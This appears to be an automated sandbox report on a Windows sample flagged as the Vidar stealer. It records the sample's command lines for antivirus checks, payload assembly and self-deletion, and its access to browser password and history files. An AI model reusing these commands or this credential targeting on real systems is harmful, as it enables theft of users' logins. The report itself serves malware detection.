Source: C:\Users\user\Desktop\RisingStrip.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Users\user\Desktop\RisingStrip.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: RisingStrip.exe

Static file information: File size 1143251 > 1048576

Source: RisingStrip.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\RisingStrip.exe

Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062FC

Source: RisingStrip.exe

Static PE information: real checksum: 0x11b7b3 should be: 0x11a537

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com

Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com

Jump to dropped file

Source: C:\Users\user\Desktop\RisingStrip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\timeout.exe TID: 5052

Thread sleep count: 83 > 30

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\RisingStrip.exe	Code function: 0_2_004062D5 FindFirstFileW,FindClose,	0_2_004062D5
Source: C:\Users\user\Desktop\RisingStrip.exe	Code function: 0_2_00402E18 FindFirstFileW,	0_2_00402E18
Source: C:\Users\user\Desktop\RisingStrip.exe	Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406C9B

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\RisingStrip.exe

Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062FC

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\RisingStrip.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Vids Vids.cmd & Vids.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 91531	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Shepherd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "copyrighted" Tell	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 91531\Red.com + Certificates + Mountain + Hydraulic + Advances + Am + Belongs + Housing + Viral + Bound 91531\Red.com	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Generated + ..\Er + ..\Soma + ..\Sponsors + ..\Identifies + ..\Phentermine + ..\Applying + ..\October q	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com Red.com q	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com" & rd /s /q "C:\ProgramData\y5xtj" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Source: Red.com, 0000000C.00000000.1680286880.00000000005E3000.00000002.00000001.01000000.00000007.sdmp, Housing.8.dr, Red.com.1.dr

Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\RisingStrip.exe

Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00406805

Stealing of Sensitive Information

Yara detected Vidar stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db	Jump to behavior
